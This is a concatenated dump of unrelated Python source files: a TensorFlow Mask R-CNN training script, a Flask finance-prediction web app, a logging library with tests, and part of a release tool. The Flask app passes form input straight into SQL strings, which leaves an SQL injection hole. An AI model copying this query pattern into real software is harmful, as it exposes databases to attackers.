from config import finalize_configs, config as cfg
class DetectionModel(ModelDesc):
def preprocess(self, image):
image = tf.expand_dims(image, 0)
image = image_preprocess(image, bgr=True)
return tf.transpose(image, [0, 3, 1, 2])
@property
def training(self):
return get_current_tower_context().is_training
def optimizer(self):
lr = tf.get_variable('learning_rate', initializer=0.003, trainable=False)
tf.summary.scalar('learning_rate-summary', lr)
# The learning rate is set for 8 GPUs, and we use trainers with average=False.
lr = lr / 8.
opt = tf.train.MomentumOptimizer(lr, 0.9)
if cfg.TRAIN.NUM_GPUS < 8:
opt = optimizer.AccumGradOptimizer(opt, 8 // cfg.TRAIN.NUM_GPUS)
return opt
def get_inference_tensor_names(self):
"""
Returns two lists of tensor names to be used to create an inference callable.
Returns:
[str]: input names
[str]: output names
"""
out = ['output/boxes', 'output/scores', 'output/labels']
if cfg.MODE_MASK:
out.append('output/masks')
return ['image'], out
def build_graph(self, *inputs):
inputs = dict(zip(self.input_names, inputs))
image = self.preprocess(inputs['image']) # 1CHW
features = self.backbone(image)
anchor_inputs = {k: v for k, v in inputs.items() if k.startswith('anchor_')}
proposals, rpn_losses = self.rpn(image, features, anchor_inputs) # inputs?
targets = [inputs[k] for k in ['gt_boxes', 'gt_labels', 'gt_masks'] if k in inputs]
head_losses = self.roi_heads(image, features, proposals, targets)
if self.training:
wd_cost = regularize_cost(
'.*/W', l2_regularizer(cfg.TRAIN.WEIGHT_DECAY), name='wd_cost')
total_cost = tf.add_n(
rpn_losses + head_losses + [wd_cost], 'total_cost')
add_moving_summary(total_cost, wd_cost)
return total_cost
class ResNetC4Model(DetectionModel):
def inputs(self):
ret = [
tf.placeholder(tf.float32, (None, None, 3), 'image'),
tf.placeholder(tf.int32, (None, None, cfg.RPN.NUM_ANCHOR), 'anchor_labels'),
tf.placeholder(tf.float32, (None, None, cfg.RPN.NUM_ANCHOR, 4), 'anchor_boxes'),
tf.placeholder(tf.float32, (None, 4), 'gt_boxes'),
tf.placeholder(tf.int64, (None,), 'gt_labels')] # all > 0
if cfg.MODE_MASK:
ret.append(
tf.placeholder(tf.uint8, (None, None, None), 'gt_masks')
) # NR_GT x height x width
return ret
def backbone(self, image):
return [resnet_c4_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS[:3])]
def rpn(self, image, features, inputs):
featuremap = features[0]
rpn_label_logits, rpn_box_logits = rpn_head('rpn', featuremap, cfg.RPN.HEAD_DIM, cfg.RPN.NUM_ANCHOR)
anchors = RPNAnchors(get_all_anchors(), inputs['anchor_labels'], inputs['anchor_boxes'])
anchors = anchors.narrow_to(featuremap)
image_shape2d = tf.shape(image)[2:] # h,w
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits) # fHxfWxNAx4, floatbox
proposal_boxes, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
cfg.RPN.TRAIN_PRE_NMS_TOPK if self.training else cfg.RPN.TEST_PRE_NMS_TOPK,
cfg.RPN.TRAIN_POST_NMS_TOPK if self.training else cfg.RPN.TEST_POST_NMS_TOPK)
if self.training:
losses = rpn_losses(
anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
featuremap = features[0]
gt_boxes, gt_labels, *_ = targets
if self.training:
# sample proposal boxes in training
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
# The boxes to be used to crop RoIs.
# Use all proposal boxes in inference
boxes_on_featuremap = proposals.boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, 14)
feature_fastrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1]) # nxcx7x7
# Keep C5 feature to be shared with mask branch
feature_gap = GlobalAvgPooling('gap', feature_fastrcnn, data_format='channels_first')
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs('fastrcnn', feature_gap, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits, gt_boxes,
tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
# In training, mask branch shares the same C5 feature.
fg_feature = tf.gather(feature_fastrcnn, proposals.fg_inds())
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', fg_feature, cfg.DATA.NUM_CATEGORY, num_convs=0) # #fg x #cat x 14x14
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 14,
pad_border=False) # nfg x 1x14x14
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_resized = roi_align(featuremap, final_boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE), 14)
feature_maskrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', feature_maskrcnn, cfg.DATA.NUM_CATEGORY, 0) # #result x #cat x 14x14
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx14x14
tf.sigmoid(final_mask_logits, name='output/masks')
return []
class ResNetFPNModel(DetectionModel):
def inputs(self):
ret = [
tf.placeholder(tf.float32, (None, None, 3), 'image')]
num_anchors = len(cfg.RPN.ANCHOR_RATIOS)
for k in range(len(cfg.FPN.ANCHOR_STRIDES)):
ret.extend([
tf.placeholder(tf.int32, (None, None, num_anchors),
'anchor_labels_lvl{}'.format(k + 2)),
tf.placeholder(tf.float32, (None, None, num_anchors, 4),
'anchor_boxes_lvl{}'.format(k + 2))])
ret.extend([
tf.placeholder(tf.float32, (None, 4), 'gt_boxes'),
tf.placeholder(tf.int64, (None,), 'gt_labels')]) # all > 0
if cfg.MODE_MASK:
ret.append(
tf.placeholder(tf.uint8, (None, None, None), 'gt_masks')
) # NR_GT x height x width
return ret
def slice_feature_and_anchors(self, p23456, anchors):
for i, stride in enumerate(cfg.FPN.ANCHOR_STRIDES):
with tf.name_scope('FPN_slice_lvl{}'.format(i)):
anchors[i] = anchors[i].narrow_to(p23456[i])
def backbone(self, image):
c2345 = resnet_fpn_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS)
p23456 = fpn_model('fpn', c2345)
return p23456
def rpn(self, image, features, inputs):
assert len(cfg.RPN.ANCHOR_SIZES) == len(cfg.FPN.ANCHOR_STRIDES)
image_shape2d = tf.shape(image)[2:] # h,w
all_anchors_fpn = get_all_anchors_fpn()
multilevel_anchors = [RPNAnchors(
all_anchors_fpn[i],
inputs['anchor_labels_lvl{}'.format(i + 2)],
inputs['anchor_boxes_lvl{}'.format(i + 2)]) for i in range(len(all_anchors_fpn))]
self.slice_feature_and_anchors(features, multilevel_anchors)
# Multi-Level RPN Proposals
rpn_outputs = [rpn_head('rpn', pi, cfg.FPN.NUM_CHANNEL, len(cfg.RPN.ANCHOR_RATIOS))
for pi in features]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
multilevel_pred_boxes = [anchor.decode_logits(logits)
for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(
multilevel_pred_boxes, multilevel_label_logits, image_shape2d)
if self.training:
losses = multilevel_rpn_losses(
multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
assert len(features) == 5, "Features have to be P23456!"
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, cfg.FPN.FRCNN_HEAD_FUNC)
if not cfg.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(features[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func('fastrcnn', roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(
'fastrcnn/outputs', head_feature, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(features[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(
proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, cfg.DATA.NUM_CLASS)
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
roi_feature_maskrcnn = multilevel_roi_align(
features[:4], proposals.fg_boxes(), 14,
name_scope='multilevel_roi_align_mask')
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 28,
pad_border=False) # fg x 1x28x28
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
# Cascade inference needs roi transform with refined boxes.
roi_feature_maskrcnn = multilevel_roi_align(features[:4], final_boxes, 14)
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx28x28
tf.sigmoid(final_mask_logits, name='output/masks')
return []
def visualize(model, model_path, nr_visualize=100, output_dir='output'):
"""
Visualize some intermediate results (proposals, raw predictions) inside the pipeline.
"""
df = get_train_dataflow() # we don't visualize mask stuff
df.reset_state()
pred = OfflinePredictor(PredictConfig(
model=model,
session_init=get_model_loader(model_path),
input_names=['image', 'gt_boxes', 'gt_labels'],
output_names=[
'generate_{}_proposals/boxes'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'generate_{}_proposals/scores'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'fastrcnn_all_scores',
'output/boxes',
'output/scores',
'output/labels',
]))
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
utils.fs.mkdir_p(output_dir)
with tqdm.tqdm(total=nr_visualize) as pbar:
for idx, dp in itertools.islice(enumerate(df), nr_visualize):
img, gt_boxes, gt_labels = dp['image'], dp['gt_boxes'], dp['gt_labels']
rpn_boxes, rpn_scores, all_scores, \
final_boxes, final_scores, final_labels = pred(img, gt_boxes, gt_labels)
# draw groundtruth boxes
gt_viz = draw_annotation(img, gt_boxes, gt_labels)
# draw best proposals for each groundtruth, to show recall
proposal_viz, good_proposals_ind = draw_proposal_recall(img, rpn_boxes, rpn_scores, gt_boxes)
# draw the scores for the above proposals
score_viz = draw_predictions(img, rpn_boxes[good_proposals_ind], all_scores[good_proposals_ind])
results = [DetectionResult(*args) for args in
zip(final_boxes, final_scores, final_labels,
[None] * len(final_labels))]
final_viz = draw_final_outputs(img, results)
viz = tpviz.stack_patches([
gt_viz, proposal_viz,
score_viz, final_viz], 2, 2)
if os.environ.get('DISPLAY', None):
tpviz.interactive_imshow(viz)
cv2.imwrite("{}/{:03d}.png".format(output_dir, idx), viz)
pbar.update()
def offline_evaluate(pred_config, output_file):
num_gpu = cfg.TRAIN.NUM_GPUS
graph_funcs = MultiTowerOfflinePredictor(
pred_config, list(range(num_gpu))).get_predictors()
predictors = []
dataflows = []
for k in range(num_gpu):
predictors.append(lambda img,
pred=graph_funcs[k]: detect_one_image(img, pred))
dataflows.append(get_eval_dataflow(shard=k, num_shards=num_gpu))
if num_gpu > 1:
all_results = multithread_eval_coco(dataflows, predictors)
else:
all_results = eval_coco(dataflows[0], predictors[0])
with open(output_file, 'w') as f:
json.dump(all_results, f)
print_coco_metrics(output_file)
def predict(pred_func, input_file):
img = cv2.imread(input_file, cv2.IMREAD_COLOR)
results = detect_one_image(img, pred_func)
final = draw_final_outputs(img, results)
viz = np.concatenate((img, final), axis=1)
cv2.imwrite("output.png", viz)
logger.info("Inference output written to output.png")
tpviz.interactive_imshow(viz)
class EvalCallback(Callback):
"""
A callback that runs COCO evaluation once a while.
It supports multi-gpu evaluation.
"""
_chief_only = False
def __init__(self, in_names, out_names):
self._in_names, self._out_names = in_names, out_names
def _setup_graph(self):
num_gpu = cfg.TRAIN.NUM_GPUS
if cfg.TRAINER == 'replicated':
# TF bug in version 1.11, 1.12: https://github.com/tensorflow/tensorflow/issues/22750
buggy_tf = get_tf_version_tuple() in [(1, 11), (1, 12)]
# Use two predictor threads per GPU to get better throughput
self.num_predictor = num_gpu if buggy_tf else num_gpu * 2
self.predictors = [self._build_coco_predictor(k % num_gpu) for k in range(self.num_predictor)]
self.dataflows = [get_eval_dataflow(shard=k, num_shards=self.num_predictor)
for k in range(self.num_predictor)]
else:
# Only eval on the first machine.
# Alternatively, can eval on all ranks and use allgather, but allgather sometimes hangs
self._horovod_run_eval = hvd.rank() == hvd.local_rank()
if self._horovod_run_eval:
self.predictor = self._build_coco_predictor(0)
self.dataflow = get_eval_dataflow(shard=hvd.local_rank(), num_shards=hvd.local_size())
self.barrier = hvd.allreduce(tf.random_normal(shape=[1]))
def _build_coco_predictor(self, idx):
graph_func = self.trainer.get_predictor(self._in_names, self._out_names, device=idx)
return lambda img: detect_one_image(img, graph_func)
def _before_train(self):
eval_period = cfg.TRAIN.EVAL_PERIOD
self.epochs_to_eval = set()
for k in itertools.count(1):
if k * eval_period > self.trainer.max_epoch:
break
self.epochs_to_eval.add(k * eval_period)
self.epochs_to_eval.add(self.trainer.max_epoch)
logger.info("[EvalCallback] Will evaluate every {} epochs".format(eval_period))
def _eval(self):
logdir = args.logdir
if cfg.TRAINER == 'replicated':
all_results = multithread_eval_coco(self.dataflows, self.predictors)
else:
filenames = [os.path.join(
logdir, 'outputs{}-part{}.json'.format(self.global_step, rank)
) for rank in range(hvd.local_size())]
if self._horovod_run_eval:
local_results = eval_coco(self.dataflow, self.predictor)
fname = filenames[hvd.local_rank()]
with open(fname, 'w') as f:
json.dump(local_results, f)
self.barrier.eval()
if hvd.rank() > 0:
return
all_results = []
for fname in filenames:
with open(fname, 'r') as f:
obj = json.load(f)
all_results.extend(obj)
os.unlink(fname)
output_file = os.path.join(
logdir, 'outputs{}.json'.format(self.global_step))
with open(output_file, 'w') as f:
json.dump(all_results, f)
try:
scores = print_coco_metrics(output_file)
for k, v in scores.items():
self.trainer.monitors.put_scalar(k, v)
except Exception:
logger.exception("Exception in COCO evaluation.")
def _trigger_epoch(self):
if self.epoch_num in self.epochs_to_eval:
logger.info("Running evaluation ...")
self._eval()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--load', help='load a model for evaluation or training. Can overwrite BACKBONE.WEIGHTS')
parser.add_argument('--logdir', help='log directory', default='train_log/maskrcnn')
parser.add_argument('--visualize', action='store_true', help='visualize intermediate results')
parser.add_argument('--evaluate', help="Run evaluation on COCO. "
"This argument is the path to the output json evaluation file")
parser.add_argument('--predict', help="Run prediction on a given image. "
"This argument is the path to the input image file")
parser.add_argument('--config', help="A list of KEY=VALUE to overwrite those defined in config.py",
nargs='+')
if get_tf_version_tuple() < (1, 6):
# https://github.com/tensorflow/tensorflow/issues/14657
logger.warn("TF<1.6 has a bug which may lead to crash in FasterRCNN if you're unlucky.")
args = parser.parse_args()
if args.config:
cfg.update_args(args.config)
MODEL = ResNetFPNModel() if cfg.MODE_FPN else ResNetC4Model()
if args.visualize or args.evaluate or args.predict:
assert tf.test.is_gpu_available()
assert args.load
finalize_configs(is_training=False)
if args.predict or args.visualize:
cfg.TEST.RESULT_SCORE_THRESH = cfg.TEST.RESULT_SCORE_THRESH_VIS
if args.visualize:
visualize(MODEL, args.load)
else:
predcfg = PredictConfig(
model=MODEL,
session_init=get_model_loader(args.load),
input_names=MODEL.get_inference_tensor_names()[0],
output_names=MODEL.get_inference_tensor_names()[1])
if args.predict:
COCODetection(cfg.DATA.BASEDIR, 'val2014') # Only to load the class names into caches
predict(OfflinePredictor(predcfg), args.predict)
elif args.evaluate:
assert args.evaluate.endswith('.json'), args.evaluate
offline_evaluate(predcfg, args.evaluate)
else:
is_horovod = cfg.TRAINER == 'horovod'
if is_horovod:
hvd.init()
logger.info("Horovod Rank={}, Size={}".format(hvd.rank(), hvd.size()))
if not is_horovod or hvd.rank() == 0:
logger.set_logger_dir(args.logdir, 'd')
finalize_configs(is_training=True)
stepnum = cfg.TRAIN.STEPS_PER_EPOCH
# warmup is step based, lr is epoch based
init_lr = cfg.TRAIN.BASE_LR * 0.33 * min(8. / cfg.TRAIN.NUM_GPUS, 1.)
warmup_schedule = [(0, init_lr), (cfg.TRAIN.WARMUP, cfg.TRAIN.BASE_LR)]
warmup_end_epoch = cfg.TRAIN.WARMUP * 1. / stepnum
lr_schedule = [(int(warmup_end_epoch + 0.5), cfg.TRAIN.BASE_LR)]
factor = 8. / cfg.TRAIN.NUM_GPUS
for idx, steps in enumerate(cfg.TRAIN.LR_SCHEDULE[:-1]):
mult = 0.1 ** (idx + 1)
lr_schedule.append(
(steps * factor // stepnum, cfg.TRAIN.BASE_LR * mult))
logger.info("Warm Up Schedule (steps, value): " + str(warmup_schedule))
logger.info("LR Schedule (epochs, value): " + str(lr_schedule))
train_dataflow = get_train_dataflow()
# This is what's commonly referred to as "epochs"
total_passes = cfg.TRAIN.LR_SCHEDULE[-1] * 8 / train_dataflow.size()
logger.info("Total passes of the training set is: {:.5g}".format(total_passes))
callbacks = [
PeriodicCallback(
ModelSaver(max_to_keep=10, keep_checkpoint_every_n_hours=1),
every_k_epochs=20),
# linear warmup
ScheduledHyperParamSetter(
'learning_rate', warmup_schedule, interp='linear', step_based=True),
ScheduledHyperParamSetter('learning_rate', lr_schedule),
EvalCallback(*MODEL.get_inference_tensor_names()),
PeakMemoryTracker(),
EstimatedTimeLeft(median=True),
SessionRunTimeout(60000).set_chief_only(True), # 1 minute timeout
]
if not is_horovod:
callbacks.append(GPUUtilizationTracker())
if is_horovod and hvd.rank() > 0:
session_init = None
else:
if args.load:
session_init = get_model_loader(args.load)
else:
session_init = get_model_loader(cfg.BACKBONE.WEIGHTS) if cfg.BACKBONE.WEIGHTS else None
traincfg = TrainConfig(
model=MODEL,
data=QueueInput(train_dataflow),
callbacks=callbacks,
steps_per_epoch=stepnum,
max_epoch=cfg.TRAIN.LR_SCHEDULE[-1] * factor // stepnum,
session_init=session_init,
starting_epoch=cfg.TRAIN.STARTING_EPOCH
)
if is_horovod:
trainer = HorovodTrainer(average=False)
else:
# nccl mode appears faster than cpu mode
trainer = SyncMultiGPUTrainerReplicated(cfg.TRAIN.NUM_GPUS, average=False, mode='nccl')
launch_train_with_config(traincfg, trainer)
``` |
{
"source": "13297915424/jinrong_predict",
"score": 3
} |
#### File: 13297915424/jinrong_predict/client.py
```python
from flask import Flask, render_template, jsonify,request,redirect,url_for
from db_client import DB_Connector
import os
import pandas as pd
import datetime
abs_path = os.getcwd()
app = Flask(__name__)
URL, PORT = '0.0.0.0',6007
def main(cls,name,msg,warn):
db = DB_Connector()
db.curse.execute("select class1 from mds_jinrong_day group by class1")
dalei = [i[0] for i in db.curse.fetchall()]
dalei.remove(cls)
dalei = [cls]+dalei
db.curse.execute("select name from %s where class1='%s' group by name" % (db.table,cls ))
names = sorted([str(i[0]) for i in db.curse.fetchall()])
names.remove(name)
names = [name]+names
db.curse.execute("select class2,date,data from %s where class1='%s' and name='%s'" % (db.table, cls, name))
dt = pd.DataFrame(db.curse.fetchall(), columns=['class2', 'date', 'data'],dtype=str)
lines = []
legend = []
xAxis = set()
predict_data = []
if cls=='银行':
tb_header = "一万元投资预计年收益(元)"
colnames = ['#', '预计收益']
else:
tb_header = "七日预测数据"
colnames = ['#', '第1日','第2日','第3日','第4日','第5日','第6日','第7日']
for cls2 in dt.groupby('class2'):
time_serise = cls2[1]
time_serise.loc[:, 'date'] = pd.to_datetime(time_serise['date'])
time_serise.loc[time_serise[time_serise['data'] == 'nan'].index, ['data']] = 0
time_serise.loc[:, 'data'] = pd.to_numeric(time_serise['data'])
time_serise = time_serise.sort_values('date')
time_serise.dropna()
last_day = time_serise.loc[time_serise.index[-1], 'date']
origin_data = [
cls2[0],
list(time_serise['date']),
list(time_serise['data'])
]
last = float(time_serise.loc[time_serise.index[-1]]['data'])
mean = float(time_serise['data'].mean())
predict = last*0.5+mean*0.5
if cls=='银行':
predict_data.append({'name': str(cls2[0]),
'date': str(last_day).split(' ')[0],
'data': [round(predict*100,2)]})
else:
step = (last-mean)/7
predict = [round(i*step+last,2) for i in range(7)]
predict_data.append({'name': str(cls2[0]),
'date': str(last_day).split(' ')[0],
'data': predict})
legend.append(str(cls2[0]))
for i in list(time_serise['date']):
xAxis.add(i)
xAxis.add(last_day)
xAxis.add(datetime.timedelta(days=1) + last_day)
lines.append(origin_data)
xAxis = list(sorted(xAxis))
new_lines = []
for line in lines:
tmp_data = [None for _ in range(len(xAxis))]
for j in range(len(line[1])):
tmp_data[xAxis.index(line[1][j])] = line[2][j]
new_lines.append([line[0], [float(p) if p else 0. if p != None else None for p in tmp_data]])
xAxis = [str(i).split(' ')[0] for i in xAxis]
return render_template('home.html', lines=new_lines, dalei=dalei, names=names, char_name=name, legend=legend,
xAxis=xAxis, predict_data=predict_data,message=msg,warn=warn,tb_header=tb_header,colnames=colnames)
@app.route('/',methods=['POST','GET'])
def home():
msg = request.args.get('msg')
warn = request.args.get('warn')
if request.method=='GET':
db = DB_Connector()
db.curse.execute("select class1,name from mds_jinrong_day limit 1")
dt = db.curse.fetchone()
print(dt)
cls = dt[0]
name = dt[1]
return main(cls,name,msg,warn)
elif request.method=='POST':
cls = request.form.get('dalei')
name = request.form.get('name')
return main(cls,name,msg,warn)
@app.route('/name',methods=['POST'])
def name():
cls = request.form.get('class1')
db = DB_Connector()
db.curse.execute("select name from %s where class1='%s' group by name"%(db.table,cls))
names = sorted([str(i[0]) for i in db.curse.fetchall()])
# print(names)
return jsonify(names)
@app.route('/upload',methods=['POST'])
def upload():
# print(request.files)
csvs = request.files.getlist("file-multiple-input")
try:
db = DB_Connector()
for csv in csvs:
db.upload_csv(csv)
return redirect(url_for('home',msg='上传成功'))
except:
return redirect(url_for('home', warn='请检查数据!'))
if __name__ == '__main__':
app.run(URL,PORT)
``` |
{
"source": "132nd-etcher/elib_logging",
"score": 3
} |
#### File: elib_logging/elib_logging/configure.py
```python
import os
import sys
import typing
from elib_logging import exc, settings
def setup_logging(logger_name: str,
log_file_name: typing.Optional[str] = None,
log_dir: typing.Optional[str] = None,
log_format_console: typing.Optional[str] = None,
log_format_file: typing.Optional[str] = None,
backup_count: typing.Optional[int] = None,):
"""Configures elib_logging based on the current executable name"""
values = [
(f'{sys.executable}ELIB_LOGGING_LOGGER_NAME', logger_name),
(f'{sys.executable}ELIB_LOGGING_LOG_FILE_NAME', log_file_name or logger_name),
(f'{sys.executable}ELIB_LOGGING_LOG_DIR', log_dir or settings.DEFAULT_LOG_DIR),
(f'{sys.executable}ELIB_LOGGING_LOG_FORMAT_CONSOLE', log_format_console or settings.DEFAULT_LOG_FORMAT_CONSOLE),
(f'{sys.executable}ELIB_LOGGING_LOG_FORMAT_FILE', log_format_file or settings.DEFAULT_LOG_FORMAT_FILE),
(f'{sys.executable}ELIB_LOGGING_BACKUP_COUNT', backup_count or settings.DEFAULT_LOG_FILE_BACKUP_COUNT),
]
for val_name, val_value in values:
os.environ[val_name] = str(val_value)
def check_settings():
"""Raises LoggerNotSetupError if there are missing config values"""
values = [
f'{sys.executable}ELIB_LOGGING_LOGGER_NAME',
f'{sys.executable}ELIB_LOGGING_LOG_FILE_NAME',
f'{sys.executable}ELIB_LOGGING_LOG_DIR',
f'{sys.executable}ELIB_LOGGING_LOG_FORMAT_CONSOLE',
f'{sys.executable}ELIB_LOGGING_LOG_FORMAT_FILE',
f'{sys.executable}ELIB_LOGGING_BACKUP_COUNT',
]
for val in values:
if os.getenv(val) is None:
raise exc.LoggerNotSetupError(f'missing value: {val}')
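# Minimal usage sketch (the 'myapp' values are assumptions, not part of this module):
# configure the shared logging environment once at startup, then verify it.
if __name__ == '__main__':
    setup_logging('myapp', log_dir='./logs', backup_count=3)
    check_settings()  # raises exc.LoggerNotSetupError if any value is missing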
```
#### File: elib_logging/elib_logging/settings.py
```python
import os
import sys
from elib_logging import exc
DEFAULT_LOG_DIR = './logs'
DEFAULT_LOG_FILE_BACKUP_COUNT = 7
DEFAULT_LOG_FORMAT_FILE = '%(relativeCreated)10d ms ' \
'%(processName)15s ' \
'%(threadName)15s ' \
'%(levelname)8s ' \
'%(name)s ' \
'[%(pathname)s@%(lineno)d %(funcName)s]: ' \
'%(message)s'
DEFAULT_LOG_FORMAT_CONSOLE = '%(relativeCreated)10d ms ' \
'%(levelname)8s: ' \
'%(message)s'
def _get_value(val_name) -> str:
sys_val_name = f'{sys.executable}{val_name}'
val_value = os.getenv(sys_val_name)
if val_value is None:
raise exc.LoggerNotSetupError(f'missing value: {val_name}')
return val_value
def logger_name() -> str:
"""Returns the main logger name"""
return _get_value('ELIB_LOGGING_LOGGER_NAME')
def log_file_name() -> str:
"""Returns the name of the base log file"""
return _get_value('ELIB_LOGGING_LOG_FILE_NAME')
def log_dir() -> str:
"""Returns the logs folder"""
return _get_value('ELIB_LOGGING_LOG_DIR')
def log_format_console() -> str:
"""Returns the format strings for console records"""
return _get_value('ELIB_LOGGING_LOG_FORMAT_CONSOLE')
def log_format_file() -> str:
"""Returns the format string for file records"""
return _get_value('ELIB_LOGGING_LOG_FORMAT_FILE')
def backup_count() -> str:
"""Returns the amount of log files to keep"""
return _get_value('ELIB_LOGGING_BACKUP_COUNT')
```
#### File: elib_logging/test/test_handlers.py
```python
import logging as base_logging
import sys
import time
import elib_logging.handlers
import elib_logging.logger
def test_handlers():
logger = elib_logging.logger.get_main_logger()
assert len(logger.handlers) == 2
for handler in logger.handlers:
assert isinstance(handler, (base_logging.FileHandler, base_logging.StreamHandler))
def test_get_handlers_with_formatter():
formatter = base_logging.Formatter()
handler = elib_logging.handlers.get_console_handler(formatter)
assert isinstance(handler, base_logging.StreamHandler)
handler = elib_logging.handlers.get_file_handler('test.log', formatter)
assert isinstance(handler, base_logging.FileHandler)
def test_queued_handler(logging_queue):
assert logging_queue.empty()
logger = elib_logging.logger.get_subprocess_logger(logging_queue, 'test_queued_handler')
assert logging_queue.empty()
logger.debug('test')
time.sleep(0.1)
assert not logging_queue.empty()
element = logging_queue.get()
assert isinstance(element, base_logging.LogRecord)
assert 'test' == element.msg
def test_frozen():
setattr(sys, 'frozen', True)
try:
logger = elib_logging.logger.get_logger()
for handler in logger.handlers:
if not isinstance(handler, base_logging.FileHandler):
assert handler.level == base_logging.INFO
finally:
delattr(sys, 'frozen')
def test_handler_level_not_frozen():
logger = elib_logging.logger.get_logger()
for handler in logger.handlers:
if not isinstance(handler, base_logging.FileHandler):
assert handler.level == base_logging.DEBUG
```
#### File: elib_logging/test/test_imports.py
```python
import glob
import pytest
@pytest.mark.nocleandir
@pytest.mark.parametrize('module_', glob.glob('./elib_logging/**/*.py', recursive=True))
def test_imports(module_):
module_ = module_[2:-3].replace('\\', '.')
__import__(module_)
@pytest.mark.nocleandir
@pytest.mark.parametrize('module_', list(glob.glob('./elib_logging/**/*.py', recursive=True)))
def test_imports_tests(module_):
module_ = module_[2:-3].replace('\\', '.')
__import__(module_)
``` |
{
"source": "132nd-etcher/epab",
"score": 2
} |
#### File: epab/cmd/_release.py
```python
import logging
import os
import shutil
import sys
from pathlib import Path
import click
import elib_run
import epab.cmd
import epab.linters
import epab.utils
from epab import __version__
from epab.core import CTX, config
LOGGER = logging.getLogger('EPAB')
def _clean():
"""
Cleans up build dir
"""
LOGGER.info('Cleaning project directory...')
folders_to_cleanup = [
'.eggs',
'build',
f'{config.PACKAGE_NAME()}.egg-info',
]
for folder in folders_to_cleanup:
if os.path.exists(folder):
LOGGER.info('\tremoving: %s', folder)
shutil.rmtree(folder)
def _copy_artifacts():
if config.ARTIFACTS():
